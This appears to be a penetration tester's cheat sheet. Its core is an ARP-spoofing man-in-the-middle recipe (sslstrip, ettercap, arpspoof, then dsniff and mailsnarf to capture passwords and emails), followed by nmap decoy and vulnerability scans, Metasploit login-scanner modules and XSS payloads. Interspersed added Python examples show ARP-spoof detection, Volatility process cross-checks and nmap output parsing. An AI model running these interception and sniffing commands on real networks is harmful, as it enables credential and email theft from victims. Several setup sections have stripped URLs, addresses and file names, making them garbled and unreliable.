1. Configure IP forwarding on attacker host

echo "1" > /proc/sys/net/ipv4/ip_forward

2. Redirection of HTTP traffic to sslstrip
2a. iptables -t nat -A PREROUTING -i eth0 -p tcp --destination-port 80 -j REDIRECT --to-port 8000
2b. iptables-save

3. SSLStrip
sslstrip -k -l 8000 -w encrypted.txt

4. Ettercap
ettercap -TqM arp:remote <victim_ip> <gateway_ip>

5. Arpspoof
5a. Single host > arpspoof -i eth0 -t <victim_ip> <gateway_ip>
5b. Whole net > arpspoof -i eth0 <gateway_ip>

6. Urlsnarf - capture HTTP
urlsnarf -i eth0

7. Driftnet - capture images
driftnet -i eth0

8. Dsniff - capture passwords
dsniff -i eth0 -w plaintext.txt

9. Mailsnarf - capture emails
mailsnarf -i eth0
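The steps above rely on forged ARP replies to pull a victim's traffic through the attacker host. The defender's counterpart is to notice those replies. The following is an added example, not part of the original notes and not code from any tool named here: it parses raw Ethernet/ARP frames and flags an IP that suddenly answers with a different MAC, a pinned host (the gateway) claimed by an unexpected MAC, or one MAC answering for several IPs. The gateway/victim addresses and the frames are constructed sample data; the pinned gateway MAC is an assumption the operator would supply from a known-good baseline.

```python
import socket
import struct
from collections import defaultdict

ETH_P_ARP = 0x0806


def parse_arp(frame):
    """Parse an Ethernet II frame carrying ARP; return None for anything else."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        return None
    htype, ptype, hlen, plen, oper = struct.unpack("!HHBBH", frame[14:22])
    if htype != 1 or ptype != 0x0800 or hlen != 6 or plen != 4:
        return None  # only Ethernet/IPv4 ARP is handled
    return {
        "op": "reply" if oper == 2 else "request",
        "sender_mac": frame[22:28].hex(":"),
        "sender_ip": socket.inet_ntoa(frame[28:32]),
        "target_mac": frame[32:38].hex(":"),
        "target_ip": socket.inet_ntoa(frame[38:42]),
    }


class ArpMonitor:
    """Tracks IP->MAC claims seen in ARP replies and raises alerts on changes."""

    def __init__(self, pinned=None):
        # pinned: {ip: mac} that must never change (assumption: supplied from a
        # known-good baseline, e.g. the default gateway).
        self.pinned = {ip: m.lower() for ip, m in (pinned or {}).items()}
        self.ip_to_mac = {}
        self.mac_to_ips = defaultdict(set)
        self.alerts = []

    def observe(self, frame):
        """Feed one frame; return the list of (severity, message) alerts it caused."""
        pkt = parse_arp(frame)
        if pkt is None or pkt["op"] != "reply":
            return []
        ip, mac = pkt["sender_ip"], pkt["sender_mac"]
        new = []
        if ip in self.pinned and self.pinned[ip] != mac:
            new.append(("HIGH", f"pinned host {ip} claimed by {mac}, expected {self.pinned[ip]}"))
        prev = self.ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            new.append(("MEDIUM", f"{ip} moved from {prev} to {mac}"))
        self.ip_to_mac[ip] = mac
        self.mac_to_ips[mac].add(ip)
        if len(self.mac_to_ips[mac]) > 1:
            new.append(("MEDIUM", f"{mac} answers for {sorted(self.mac_to_ips[mac])}"))
        self.alerts.extend(new)
        return new


def _arp_frame(op, sender_mac, sender_ip, target_mac, target_ip):
    """Build a constructed ARP frame for the sample data below (test input only)."""
    mac = lambda s: bytes.fromhex(s.replace(":", ""))
    dst = "ff:ff:ff:ff:ff:ff" if op == 1 else target_mac
    eth = mac(dst) + mac(sender_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (struct.pack("!HHBBH", 1, 0x0800, 6, 4, op)
           + mac(sender_mac) + socket.inet_aton(sender_ip)
           + mac(target_mac) + socket.inet_aton(target_ip))
    return eth + arp


# Constructed addresses (not a real network).
GW_IP, GW_MAC = "192.168.1.1", "aa:bb:cc:00:00:01"
VICTIM_IP, VICTIM_MAC = "192.168.1.20", "aa:bb:cc:00:00:20"
ROGUE_MAC = "de:ad:be:ef:00:99"

SAMPLE_FRAMES = [
    _arp_frame(1, VICTIM_MAC, VICTIM_IP, "00:00:00:00:00:00", GW_IP),  # who-has gateway
    _arp_frame(2, GW_MAC, GW_IP, VICTIM_MAC, VICTIM_IP),                # legitimate reply
    _arp_frame(2, ROGUE_MAC, GW_IP, VICTIM_MAC, VICTIM_IP),             # rogue claims gateway
    _arp_frame(2, ROGUE_MAC, VICTIM_IP, GW_MAC, GW_IP),                 # rogue claims victim
]


def run_sample(frames=SAMPLE_FRAMES):
    """Run the monitor over the constructed frames and return all alerts."""
    mon = ArpMonitor(pinned={GW_IP: GW_MAC})
    for f in frames:
        mon.observe(f)
    return mon.alerts


if __name__ == "__main__":
    for sev, msg in run_sample():
        print(sev, msg)
```

On the sample sequence the legitimate gateway reply produces nothing, the rogue claim on the gateway produces a HIGH (pinned mismatch) plus a MEDIUM (IP moved), and the rogue claim on the victim produces a MEDIUM because one MAC now answers for two IPs. The MEDIUM severity is deliberate: DHCP churn or a replaced NIC also moves an IP, so only the pinned-host case is treated as high confidence.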

Memory analysis :: Volatility


Memory acquisition:
Dump memory using FTK Imager or similar software.

> volatility pslist -f memory.img

> volatility svcscan -f memory.img --profile=Win7SP0x64

Hidden/terminated processes:
> volatility psscan -f memory.img

Yara scan:
> volatility yarascan --yara-file=/path/to/rules.yar -f memory.img
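The reason psscan is listed next to pslist is the cross-view check: pslist walks the kernel's linked process list, psscan carves _EPROCESS structures out of physical memory, so anything psscan finds that pslist does not is either a terminated process (psscan still shows an exit time) or one unlinked from the list to hide it. The following is an added example, not part of the original notes and not Volatility's own code: it parses the two listings and reports the difference. The listings are constructed and simplified to the columns the check needs (offset, name, PID, PPID, then timestamps), not real tool output.

```python
import re

# Constructed, simplified pslist output: every process the kernel list knows about.
PSLIST_OUT = """\
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start
------------------ -------------------- ------ ------ ------ -------- ------ ------ -------------------
0xfffffa8000c5b040 System                    4      0     85      500 ------      0 2024-01-01 09:00:00
0xfffffa8001a2e060 explorer.exe           1432   1400     32      900      1      0 2024-01-01 09:01:10
0xfffffa8001b77b30 svchost.exe             812    620     12      350      0      0 2024-01-01 09:00:30
"""

# Constructed, simplified psscan output: carved from physical memory, so it also
# holds exited processes (two timestamps) and unlinked ones (one timestamp).
PSSCAN_OUT = """\
Offset(P)          Name                PID   PPID PDB                Time created                   Time exited
------------------ ---------------- ------ ------ ------------------ ------------------------------ ------------------------------
0x0000000001c5b040 System                4      0 0x0000000000187000 2024-01-01 09:00:00 UTC+0000
0x000000000be2e060 explorer.exe       1432   1400 0x00000000341ac000 2024-01-01 09:01:10 UTC+0000
0x000000000bf77b30 svchost.exe         812    620 0x000000002c0ea000 2024-01-01 09:00:30 UTC+0000
0x000000000c103060 notepad.exe        2210   1432 0x000000003f8e1000 2024-01-01 09:05:00 UTC+0000   2024-01-01 09:06:00 UTC+0000
0x000000000c9a4b30 svch0st.exe        2744    812 0x0000000041d22000 2024-01-01 09:07:20 UTC+0000
"""

# Data rows start with a hex offset; header and ruler lines do not.
ROW_RE = re.compile(r"^(0x[0-9a-fA-F]+)\s+(\S+)\s+(\d+)\s+(\d+)\s+(.*)$")
TS_RE = re.compile(r"\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}")


def parse_rows(text):
    """Map (pid, name) -> remainder of the row for each process line."""
    rows = {}
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            _offset, name, pid, _ppid, rest = m.groups()
            rows[(int(pid), name)] = rest
    return rows


def compare_process_views(pslist_text, psscan_text):
    """Return processes psscan found that pslist did not, split by whether they exited."""
    listed = parse_rows(pslist_text)
    scanned = parse_rows(psscan_text)
    findings = {"terminated": [], "hidden": []}
    for key, rest in scanned.items():
        if key in listed:
            continue
        # Created and exited timestamps both present -> the process simply ended.
        bucket = "terminated" if len(TS_RE.findall(rest)) >= 2 else "hidden"
        findings[bucket].append(key)
    return findings


if __name__ == "__main__":
    for bucket, procs in compare_process_views(PSLIST_OUT, PSSCAN_OUT).items():
        print(bucket, procs)
```

Keying on (PID, name) rather than PID alone catches PID reuse. In the constructed data notepad.exe is classed as terminated, while the look-alike svch0st.exe has no exit time and is absent from pslist, which is the pattern worth a closer look with the other Volatility plugins.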


Scan methodology

  1. Scan for live hosts

    1. nmap -sn -oA subnet_live
  2. Parse list w/ live hosts (keep only "Status: Up" rows so the "# Nmap" header/footer lines do not end up in the target list)

    1. cat subnet_live.gnmap | grep 'Status: Up' | awk '{print $2}' > subnet_live_parsed
  3. Scan hosts for app ver. of top 500 ports

    1. nmap -sS -sV -O --min-parallelism 400 --max-parallelism 512 --script banner.nse,http-headers --top-ports 500 -iL subnet_live_parsed -oA subnet_live_top500
  4. Parse lists for top vuln. ports (grep -w, so that 80/open does not also match 8080/open or 1080/open)

    1. All found
      1. cat subnet_live_top500.gnmap | grep -w '21/open\|22/open\|80/open\|81/open\|85/open\|88/open\|443/open\|1433/open\|3128/open\|3306/open\|5900/open\|8080/open' | awk '{print $2}' > subnet_live_top_vulnports
    2. FTP
      1. cat subnet_live_top500.gnmap | grep -w 21/open | awk '{print $2}' > subnet_live_ftp
    3. SSH
      1. cat subnet_live_top500.gnmap | grep -w 22/open | awk '{print $2}' > subnet_live_ssh
    4. MSSQL
      1. cat subnet_live_top500.gnmap | grep -w 1433/open | awk '{print $2}' > subnet_live_mssql
    5. MYSQL
      1. cat subnet_live_top500.gnmap | grep -w 3306/open | awk '{print $2}' > subnet_live_mysql
    6. VNC
      1. cat subnet_live_top500.gnmap | grep -w 5900/open | awk '{print $2}' > subnet_live_vnc
    7. HTTP
      1. cat subnet_live_top500.gnmap | grep -w 80/open | awk '{print $2}' > subnet_live_http
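Steps 2 and 4 above are both parsers for nmap's greppable output, and the grep/awk form has two traps: a bare "80/open" also matches "8080/open", and the "# Nmap ..." header lines contribute junk "targets". The following is an added example, not part of the original notes: a small .gnmap parser that splits the Ports field properly (port/state/protocol/owner/service/rpc/version), keys on port and protocol, and keeps only hosts whose Status is Up. The scan output embedded below is constructed sample data, not a real scan, and the same functions generalise to any port list, not just the ones in step 4.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed .gnmap sample (not from a real scan). Note the 8080 vs 80 and
# 2121 vs 21 cases, a closed 1433 and a filtered 5900.
SAMPLE_GNMAP = """\
# Nmap 7.80 scan initiated Mon Jan  1 00:00:00 2024 as: nmap -sS -sV -oA subnet_live_top500 -iL subnet_live_parsed
Host: 10.0.0.5 ()\tStatus: Up
Host: 10.0.0.5 ()\tPorts: 22/open/tcp//ssh//OpenSSH 7.4/, 80/open/tcp//http//nginx/, 8080/open/tcp//http-proxy///\tIgnored State: closed (497)
Host: 10.0.0.7 ()\tStatus: Up
Host: 10.0.0.7 ()\tPorts: 21/open/tcp//ftp//vsftpd 3.0.3/, 1433/closed/tcp//ms-sql-s///, 3306/open/tcp//mysql//MySQL 5.7/
Host: 10.0.0.9 ()\tStatus: Up
Host: 10.0.0.9 ()\tPorts: 2121/open/tcp//ccproxy-ftp///, 5900/filtered/tcp//vnc///
# Nmap done at Mon Jan  1 00:01:00 2024 -- 3 IP addresses (3 hosts up) scanned in 60.00 seconds
"""

HOST_RE = re.compile(r"^Host:\s+(\S+)\s+\(([^)]*)\)\s+(.*)$")


def _sorted_ips(ips):
    return sorted(set(ips), key=ipaddress.ip_address)


def live_hosts(text):
    """IPs with 'Status: Up' (what step 2 wants from the -sn output)."""
    ips = []
    for line in text.splitlines():
        m = HOST_RE.match(line)  # '# Nmap ...' lines never match
        if m and "Status: Up" in m.group(3):
            ips.append(m.group(1))
    return _sorted_ips(ips)


def parse_gnmap(text):
    """Return {ip: {(port, proto): (state, service, version)}} from a .gnmap file."""
    hosts = defaultdict(dict)
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if not m:
            continue
        ip, _hostname, rest = m.groups()
        for field in rest.split("\t"):  # Ports:, Ignored State:, OS:, ...
            if not field.startswith("Ports:"):
                continue
            for entry in field[len("Ports:"):].split(","):
                # Version text may itself contain '/', so split at most 6 times.
                parts = entry.strip().split("/", 6)
                if len(parts) != 7:
                    continue
                port, state, proto, _owner, service, _rpc, version = parts
                hosts[ip][(int(port), proto)] = (state, service, version.rstrip("/"))
    return dict(hosts)


def hosts_with_open_port(hosts, port, proto="tcp"):
    """Exact (port, proto) match: 80 never matches 8080, closed/filtered are excluded."""
    return _sorted_ips(ip for ip, ports in hosts.items()
                       if (port, proto) in ports and ports[(port, proto)][0] == "open")


def hosts_with_any_open_port(hosts, ports, proto="tcp"):
    """Step 4's 'All found' list for an arbitrary port list."""
    return _sorted_ips(ip for p in ports for ip in hosts_with_open_port(hosts, p, proto))


if __name__ == "__main__":
    parsed = parse_gnmap(SAMPLE_GNMAP)
    print("live:", live_hosts(SAMPLE_GNMAP))
    for p in (21, 22, 80, 1433, 3306, 5900, 8080):
        print(p, hosts_with_open_port(parsed, p))
```

Writing the per-service lists is then one call per port, and the parsed dictionary also keeps the state and version strings the grep pipeline throws away, which is what you need later to match banners against known-vulnerable versions.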

Metasploit scans of found hosts & their respective ports

  1. FTP scan :: msf > use auxiliary/scanner/ftp/ftp_login
  2. SSH scan :: msf > use auxiliary/scanner/ssh/ssh_login
  3. MSSQL scan :: msf > use auxiliary/scanner/mssql/mssql_login
  4. SNMP scan :: msf > use auxiliary/scanner/snmp/snmp_enum; snmp_login
  5. MYSQL scan :: msf > use auxiliary/scanner/mysql/mysql_login
  6. VNC scan :: msf > use auxiliary/scanner/vnc/vnc_login

Top Ports

nmap -sS -sV -O --min-parallelism 400 --max-parallelism 512 --script banner.nse,http-headers --top-ports 500

Search for BMC Vuln

nmap -p 49152 -n -oA ./bmc_vuln.txt --min-parallelism 512 --min-rate 400 -Pn

Search for MSSQL

  • nmap -sV -p T:1433 -n -oG ./scans/mssql_tcp_1433_scan.txt -Pn --min-parallelism 512 --min-rate 400 [ip_range]
  • nmap -p 1433 -oG ./scans/mssql_tcp_1433_scan.txt --script ms-sql-info --script-args mssql.instance-port=1433 --min-parallelism 512 --min-rate 400 [ip_range]

Web server enumeration
nmap -sV --script=http-enum [target_ip]

Check for vulns.
nmap --script=smb-check-vulns -p445 [target_ip]

nmap -sn [target_ip] --script=dns-blacklist

nmap -T4 -A -v --script=sql-injection [target_ip]

Decoy scan
nmap -D RND:10 [target_ip]

nmap -D decoy1,decoy2,etc [target_ip]

Live hosts
nmap -sn [target_net]

Host scan
nmap -sS -Pn -n -PS [target_ip]

Host service scan
nmap -sS -Pn -n -A [target_ip]

Hosts down (-v is needed for down hosts to appear in the greppable output; -oG - writes it to stdout)
nmap -v -sn -oG - [target_ip] | grep Down


Scripts :: Kali


KAAISv3 by rawstring

  • wget v4.3 by peterubuntu10

  • wget

Lazy Kali

  • wget
  • wget by

  • svn checkout phillips321 by Lee Baird

  • git clone

1st setup :: Kali


Correct sources.list

nano /etc/apt/sources.list
add following to sources.list:

Regular repos
deb kali main non-free contrib
deb kali/updates main contrib non-free

Bleeding Edge repos
deb kali-bleeding-edge contrib non-free main

# apt-get update
# apt-get upgrade

In VBox Environ

VBox Additions
1. apt-get update && apt-get install linux-headers-$(uname -r) -y
3. mount VBoxAdditions package
4. copy install package ( to /tmp
5. chmod 755 /tmp/
6. ./
7. logout or reboot guest machine


  • apt-get update && apt-get upgrade -y && apt-get dist-upgrade -y && reboot




Test cases:

  • >"'><script>alert('XSS')</script>
  • >%22%27><img%20src%3d%22javascript:alert(%27XSS%27)%22>
  • AK%22%20style%3D%22background:url(javascript:alert(%27XSS%27))%22%20OS%22
  • %22%2Balert(%27XSS%27)%2B%22
  • <table background="javascript:alert(([code])"></table>
  • <object type=text/html data="javascript:alert(([code]);"></object>
  • <body onload="javascript:alert(([code])"></body>

Kali Pi :: Initial Setup



[Static IP]
nano /etc/network/interfaces

Add the following lines at the bottom of the file (comment out the lines above, except the loopback iface):

auto eth0
allow-hotplug eth0
iface eth0 inet static

[DNS Conf]
nano /etc/resolv.conf

[Assign static default gateway]
ip route add default via

[Restart networking]
/etc/init.d/networking restart

Rebuild ssh keys
rm /etc/ssh/ssh_host_*
dpkg-reconfigure openssh-server
service ssh restart

Expand USB
run /scripts/

Update Kali
apt-get update && apt-get -y upgrade && apt-get -y dist-upgrade && apt-get autoremove && reboot

Check service status
service ssh status
service postgresql status
service apache2 status


- TightVNC
apt-get install tightvncserver
update-rc.d tightvncserver enable

[Reset password]

- Metasploit
apt-get install metasploit-framework
update-rc.d metasploit-framework enable


Make services persistent
update-rc.d ssh enable
update-rc.d apache2 enable
update-rc.d postgresql enable
update-rc.d metasploit-framework enable